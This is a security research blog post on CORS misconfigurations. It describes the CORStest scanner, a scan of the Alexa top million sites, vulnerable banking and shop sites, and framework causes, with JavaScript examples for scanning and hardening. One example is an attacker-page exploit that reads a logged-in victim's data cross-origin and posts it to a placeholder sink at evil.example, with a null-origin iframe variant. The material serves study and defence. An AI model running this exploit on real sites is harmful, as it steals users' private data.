Tuesday, 4 July 2017

CORS misconfigurations on a large scale

Inspired by James Kettle's great OWASP AppSec Europe talk on CORS misconfigurations, we decided to fiddle around with CORS security issues a bit. We were curious how many websites out there are actually vulnerable because of dynamically generated or misconfigured CORS headers.

The issue: CORS misconfiguration

Cross-Origin Resource Sharing (CORS) is a technique to punch holes into the Same-Origin Policy (SOP), on purpose. It enables web servers to explicitly allow cross-site access to a certain resource by returning an Access-Control-Allow-Origin (ACAO) header. Sometimes the value is even generated dynamically from user input such as the Origin header sent by the browser. If misconfigured, an unintended website can access the resource. Furthermore, if the Access-Control-Allow-Credentials: true (ACAC) response header is also set, the browser attaches the victim's cookies to the cross-origin request and lets the attacker's page read the response, so an attacker can leak sensitive information from a logged-in user, which is almost as bad as XSS on the actual website. Below is a list of CORS misconfigurations which can potentially be exploited. For more technical details on the issues, read this fine blog post.
Misconfiguration        Description
Developer backdoor      Insecure developer/debug origins such as JSFiddle or CodePen are allowed to access the resource
Origin reflection       The Origin is simply echoed in the ACAO header; any site is allowed to access the resource
Null misconfiguration   Any site is allowed access by forcing the null origin via a sandboxed iframe
Pre-domain wildcard     notdomain.com is allowed access, which can simply be registered by the attacker
Post-domain wildcard    domain.com.evil.com is allowed access, which can simply be set up by the attacker
Subdomains allowed      sub.domain.com is allowed access; exploitable if the attacker finds an XSS in any subdomain
Non-SSL sites allowed   An HTTP origin is allowed to access an HTTPS resource, which lets an active MitM inject script into any plain-HTTP page and read the HTTPS resource despite encryption
Invalid CORS header     Wrong use of wildcards (e.g. *.domain.com) or multiple origins in one header; not a security problem as such, but should be fixed

The tool: CORStest

Testing for such vulnerabilities can easily be done with curl(1). To support some more options, for example parallelization, we wrote CORStest, a simple Python-based CORS misconfiguration checker. It takes as input a text file containing a list of domain names or URLs to check and supports some further options:
usage: corstest.py [arguments] infile

positional arguments:
  infile         File with domain or URL list

optional arguments:
  -h, --help     show this help message and exit
  -c name=value  Send cookie with all requests
  -p processes   multiprocessing (default: 32)
  -s             always force ssl/tls requests
  -q             quiet, allow-credentials only
  -v             produce a more verbose output

CORStest detects potential vulnerabilities by sending various Origin request headers and checking the Access-Control-Allow-Origin header in the response. An example of the output, for those of the Alexa top 750 websites which allow credentials on CORS requests, is given below.
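To make the table and the checker concrete, here is an added example (not CORStest's own code, which is Python) of the probe-and-classify logic such a tool performs, written in JavaScript for Node.js. One Origin value is sent per row of the table above and the response's ACAO/ACAC headers decide the finding. The `send(origin)` callback is where a real scanner would issue the HTTP request with that Origin header; the three responders at the bottom are constructed stand-ins so the script runs offline, and domain.com / evil.example are placeholders.

```javascript
// Added example, not CORStest's own code: probe-and-classify logic of a CORS
// misconfiguration checker. send(origin) must return the response headers
// (lower-cased keys); the responders below are constructed, so this runs offline.

// Valid ACAO values are "*", "null", or exactly one serialized origin.
const ORIGIN_RE = /^(https?|wss?):\/\/[^\s\/,]+$/;

// One probe per row of the misconfiguration table. Host is taken from the target.
function probeOrigins(targetUrl) {
  const host = new URL(targetUrl).hostname;           // e.g. "domain.com"
  return [
    ["Origin reflection",     "https://evil.example"],            // arbitrary third party
    ["Null misconfiguration", "null"],                            // sandboxed iframe / data: URL
    ["Pre-domain wildcard",   `https://not${host}`],              // notdomain.com
    ["Post-domain wildcard",  `https://${host}.evil.example`],    // domain.com.evil.example
    ["Subdomains allowed",    `https://corstest.${host}`],        // any subdomain
    ["Non-SSL sites allowed", `http://${host}`],                  // plain-HTTP origin
    ["Developer backdoor",    "https://jsfiddle.net"],            // debug/dev origin
  ];
}

// What one response says about the probe that provoked it (null = nothing).
function classify(issue, sentOrigin, headers) {
  const acao = headers["access-control-allow-origin"];
  const acac = headers["access-control-allow-credentials"] === "true";
  if (acao === undefined) return null;                   // CORS not enabled here
  if (acao === "*") {                                    // browsers never credential "*"
    return { issue: acac ? "Invalid CORS header" : "Public wildcard", value: "*", credentials: acac };
  }
  if (acao !== "null" && !ORIGIN_RE.test(acao)) {        // "*.domain.com", "a, b", "self", ...
    return { issue: "Invalid CORS header", value: acao, credentials: acac };
  }
  if (acao !== sentOrigin) return null;                  // our probe origin was not admitted
  return { issue, origin: sentOrigin, credentials: acac };
}

function scan(targetUrl, send) {
  const findings = [];
  const seen = new Set();
  for (const [issue, origin] of probeOrigins(targetUrl)) {
    // An http:// origin is only a finding when the resource itself is https://.
    if (issue === "Non-SSL sites allowed" && !targetUrl.startsWith("https:")) continue;
    const f = classify(issue, origin, send(origin));
    if (f && !seen.has(f.issue)) { seen.add(f.issue); findings.push(f); }
  }
  return findings;
}

// The cases the post counts as exploitable directly by a web attacker; they
// only leak a logged-in user's data when ACAC: true is present (the -q view).
const WEB_ATTACKER = new Set(["Developer backdoor", "Origin reflection",
  "Null misconfiguration", "Pre-domain wildcard", "Post-domain wildcard"]);
function exploitableByWebAttacker(findings) {
  return findings.filter(f => f.credentials && WEB_ATTACKER.has(f.issue));
}

// Constructed responders standing in for three kinds of servers.
const reflectingServer = origin => ({
  "access-control-allow-origin": origin,
  "access-control-allow-credentials": "true",
});
const suffixMatchServer = origin =>                      // naive "ends with domain.com"
  origin.endsWith("domain.com")
    ? { "access-control-allow-origin": origin, "access-control-allow-credentials": "true" }
    : {};
const invalidServer = () => ({ "access-control-allow-origin": "*.domain.com" });

function demo() {
  const target = "https://domain.com/";
  return {
    reflecting: scan(target, reflectingServer),   // every probe admitted
    suffix:     scan(target, suffixMatchServer),  // pre-domain, subdomain, non-SSL
    invalid:    scan(target, invalidServer),      // one invalid-header finding
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The suffix-match responder shows why a checker needs all probes rather than a single "evil.com" one: it rejects a random third-party origin but admits notdomain.com, which an attacker can simply register.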

Evaluation with Alexa top 1 Million websites

To evaluate on a larger scale how many sites actually have wide-open CORS configurations, we ran CORStest on the Alexa top 1 million sites:
$ git clone https://github.com/RUB-NDS/CORStest.git && cd CORStest/
$ wget -q http://s3.amazonaws.com/alexa-static/top-1m.csv.zip
$ unzip top-1m.csv.zip
$ awk -F, '{print $2}' top-1m.csv > alexa.txt
$ ./corstest.py alexa.txt
This test took about 14 hours on a decent connection and revealed the following results: only 29,514 websites (about 3%) actually supported CORS on their main page, i.e. responded with an Access-Control-Allow-Origin header. Of course, many sites such as Google only enable CORS headers for certain resources, not directly on their landing page. We could have crawled all websites (including subdomains) and fed the input to CORStest. However, this would have taken a long time, and for statistics our quick & dirty approach should still be fine. Furthermore, it must be noted that the test was only performed with GET requests (without any CORS preflight) against the http:// version of the websites (with redirects followed).

Note that just because a website, for example, reflects the Origin header, it is not necessarily vulnerable. The context matters: such a configuration can be totally fine for public sites or API endpoints intended to be accessible by everyone. It can be disastrous for payment sites or social media platforms. Furthermore, to be actually exploitable the Access-Control-Allow-Credentials: true (ACAC) header must be set as well. Therefore we repeated the test, this time limited to sites that return this header (see the CORStest -q flag):
$ ./corstest.py -q alexa.txt
This revealed even worse results: almost half of the websites that send both ACAO and ACAC headers contained a CORS misconfiguration that could be exploited directly by a web attacker (developer backdoor, origin reflection, null misconfiguration, pre-/post-domain wildcard).

The Impact: SOP/SSL bypass on payment and taxpayer sites

Note that not all tested websites were actually exploitable. Some contained only public data, and others, such as Bitbucket, had CORS enabled for their main page but not for the subpages containing user data. Manually testing the sites, we found the following to be vulnerable:
  • A dozen online banking, bitcoin and other payment sites; one of them allowed us to create a test account, so we were able to write proof-of-concept code which could actually have been used to steal money
  • Hundreds of online shops/e-commerce sites and a bunch of hotel/flight booking sites
  • Various social networks and miscellaneous sites which allow users to log in and communicate
  • One US state's tax filing website (however, this one was exploitable by a MitM only)
We informed all sites we manually tested and found to be vulnerable. A simple exploit code example, run while the victim is logged into a website with CORS origin reflection, is given below.
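The exploit example the post refers to is not reproduced on this page. As an added example (not the original proof of concept), the following is the attacker-page JavaScript for a site whose ACAO reflects the Origin header together with Access-Control-Allow-Credentials: true. The victim must be logged in to the target and visit the attacker's page; all URLs are placeholders, and `fetchImpl` is a parameter only so the flow can be driven with a fake fetch outside a browser.

```javascript
// Added example, not the post's own PoC: attacker-page script against a site
// that reflects the Origin header and sends ACAC: true. URLs are placeholders.

const TARGET = "https://domain.com/account/profile";   // authenticated endpoint (assumed)
const EXFIL  = "https://evil.example/collect";          // attacker-controlled sink (assumed)

// credentials: "include" makes the browser attach the victim's cookies. Because
// the response carries ACAO: <attacker origin> and ACAC: true, the SOP check
// passes and the attacker's script may read the body.
async function stealViaCors(targetUrl, fetchImpl = globalThis.fetch) {
  const resp = await fetchImpl(targetUrl, { method: "GET", credentials: "include", mode: "cors" });
  return resp.text();                                   // the victim's private data
}

// A POST with a plain string body is a "simple" request: no preflight, and
// mode "no-cors" means we do not care that the sink's response is opaque.
async function exfiltrate(data, sinkUrl, fetchImpl = globalThis.fetch) {
  await fetchImpl(sinkUrl, { method: "POST", mode: "no-cors", body: data });
}

// Null-origin variant: the same payload run inside a sandboxed iframe that has
// allow-scripts but NOT allow-same-origin, so the browser serializes its
// origin as "null" and a server that allows "null" reflects it.
function nullOriginIframe(payloadJs) {
  const html = `<script>${payloadJs}</script>`;
  return `<iframe sandbox="allow-scripts" srcdoc="${html.replace(/"/g, "&quot;")}"></iframe>`;
}

// Run from the attacker's page in a browser:
// stealViaCors(TARGET).then(data => exfiltrate(data, EXFIL));
```

The whole attack is a single credentialed GET followed by a simple POST; nothing about it triggers a preflight, which is why the scan above could get away with plain GET requests as well.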

The Reason: Copy & Paste and broken frameworks

We were further interested in the reasons for CORS misconfigurations. In particular, we wanted to learn whether there is a correlation between the technology used and misconfiguration. Therefore we used WhatWeb to fingerprint the web technologies of all vulnerable sites. CORS is usually enabled either directly in the HTTP server configuration or by the web application/framework. While we could not identify a single major cause for CORS misconfigurations, we found various potential reasons. A majority of dangerous Access-Control-* headers had probably been introduced by developers; others, however, are based on bugs and bad practices in some products. Insights follow:
  • Various websites return invalid CORS headers; besides wrong use of wildcards such as *.domain.com, ACAO headers which contain multiple origins can often be found. Other examples of invalid, but quite creative, ACAO values we observed are: self, true, false, undefined, None, 0, (null), domain, origin, SAMEORIGIN
  • Rack::Cors, the de facto standard library to enable CORS for Ruby on Rails, maps origins '' or origins '*' into reflecting arbitrary origins. This is dangerous, because developers would think that '' allows nothing and that '*' behaves according to the spec, where it is mostly harmless because it cannot be used to make credentialed requests. This configuration error leads to origin reflection with ACAC headers on about a hundred of the tested and vulnerable websites
  • A majority of websites which allow an http origin CORS access to an https resource run on IIS; this seems to be no bug in IIS itself but rather caused by bad advice found on the Internet
  • nginx is the winner when it comes to serving websites with origin reflection; again, this is not an issue of nginx but of dangerous configs copied from Stack Overflow; same problem for Phusion Passenger
  • The null ACAO value may stem from programming languages that simply return null if no value is given (we haven't found any specific framework though); another explanation is that 'CORS in Action', a popular book on CORS, contains various examples with code such as var originWhitelist = ['null', ...], which could be misinterpreted by developers as safe
  • If CORS is enabled in the crVCL PHP Framework, it adds ACAC and ACAO headers for a configured domain. Unfortunately, it also introduces a post-domain and pre-subdomain wildcard vulnerability: sub.domain.com.evil.com
  • All sites that are based on "Solo Build It!" (scam?) respond with: Access-Control-Allow-Origin: http://sbiapps.sitesell.com
  • Some sites have :// or // as fixed ACAO values. How should browsers deal with this? Inconsistently, at least: Firefox, Chrome, Safari and Opera allow arbitrary origins while IE and Edge deny all origins.
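The patterns in this list (echoing the Origin, an unanchored pattern, an allow-list that contains 'null') all come down to how the server decides which origin to put into ACAO. The following added example, not taken from the post or from any of the products named above, shows three such checks beside a hardened one, as plain functions that return the ACAO value to send or null for "send no CORS headers". domain.com, app.domain.com and evil.example are placeholders.

```javascript
// Added example (not from the post or any named product): origin checks of the
// kinds listed above, beside a strict allow-list. Each returns the ACAO value
// to send, or null for "no CORS headers at all". Domains are placeholders.

// (a) "Allow everything" by echoing the Origin. Combined with ACAC: true this
//     is origin reflection: any site can read authenticated responses.
function reflectOrigin(origin) {
  return origin || null;
}

// (b) Unanchored regex of the kind copied from a forum answer. It admits
//     notdomain.com (pre-domain) and domain.com.evil.example (post-domain) alike.
const SLOPPY_RE = /^https:\/\/.*domain\.com/;
function sloppyRegex(origin) {
  return SLOPPY_RE.test(origin) ? origin : null;
}

// (c) Allow-list that includes "null". Any page in a sandboxed iframe or loaded
//     from a data: URL has the serialized origin "null", so it gets in.
const LIST_WITH_NULL = new Set(["https://domain.com", "null"]);
function allowlistWithNull(origin) {
  return LIST_WITH_NULL.has(origin) ? origin : null;
}

// Hardened: exact match of the full serialized origin (scheme included) against
// a closed list. No "null", no wildcard, no regex, no http:// origin for an
// https:// resource. Every listed origin inherits this resource's trust, so an
// XSS on app.domain.com is an XSS here: keep the list short.
const ALLOWED = new Set(["https://domain.com", "https://app.domain.com"]);
function strictAllowlist(origin) {
  return ALLOWED.has(origin) ? origin : null;
}

// Headers to emit for a request. Unknown origins get none at all, and
// Vary: Origin keeps a shared cache from replaying one origin's ACAO to another.
function corsHeaders(origin) {
  const allowed = strictAllowlist(origin);
  if (allowed === null) return {};
  return {
    "Access-Control-Allow-Origin": allowed,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Origins an attacker (or CORStest) would try, plus one legitimate origin.
const PROBES = ["https://evil.example", "null", "https://notdomain.com",
  "https://domain.com.evil.example", "http://domain.com", "https://app.domain.com"];

function admitted(check) {
  return PROBES.filter(o => check(o) !== null);
}

for (const [name, check] of [["reflect", reflectOrigin], ["regex", sloppyRegex],
    ["null-list", allowlistWithNull], ["strict", strictAllowlist]]) {
  console.log(name.padEnd(10), admitted(check).join(" ") || "(none)");
}
```

Rack::Cors' `origins '*'` behaves like (a) here: developers expect the spec's anonymous-only wildcard and get credentialed reflection instead. The strict variant is the only one of the four for which every admitted origin was a deliberate decision.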
